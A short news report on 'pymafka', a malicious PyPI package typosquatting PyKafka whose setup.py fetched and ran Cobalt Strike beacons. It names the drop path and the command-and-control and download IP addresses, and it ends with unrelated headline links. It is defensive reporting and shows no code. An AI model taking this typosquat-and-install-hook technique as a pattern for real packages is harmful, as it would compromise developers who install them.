Malicious 'pymafka' Package Spreads Cobalt Strike Beacons via PyPI
A malicious Python package, 'pymafka', has been discovered on the PyPI registry. It's a typosquat of the legitimate 'PyKafka' library, downloaded over 4 million times. The package has been used to spread Cobalt Strike beacons, with around 300 infections before its removal.
The 'pymafka' package contains a 'setup.py' script that downloads and executes a Cobalt Strike beacon on infected systems, depending on the user's operating system. On Windows, the beacon is dropped at 'C:UsersPubliciexplorer.exe', mimicking the legitimate 'iexplore.exe' process. The beacon attempts to contact the China-based IP 39.106.227[.]92, assigned to Alibaba (Alisoft).
The malicious executables 'win.exe' and 'MacOS' are downloaded from the IP address 141.164.58[.]147, commissioned by Vultr. The package was investigated and reported by Moonlock Lab, the cybersecurity division of MacPaw. It was discovered by Sonatype's automated malware detection bots and taken down after Sonatype reported it to PyPI, preventing further downloads.
The 'pymafka' package has been removed from PyPI, but it had been downloaded around 300 times before its removal. Users are advised to be cautious when installing Python packages and to stick to well-known, trusted sources. The investigation into the creators of 'pymafka' is ongoing.
Read also:
- Electric-powered vessels take to the waters of Maine
- Elon Musk accused by Sam Altman of exploiting X for personal gain
- Comparing the value of top electric scooters: Kinetic DX versus Bajaj Chetak versus TVS iQube - Which one offers the best bang for the buck?
- Tech tycoon Elon Musk alleges Apple is preferring OpenAI, sparking potential lawsuits contemplation
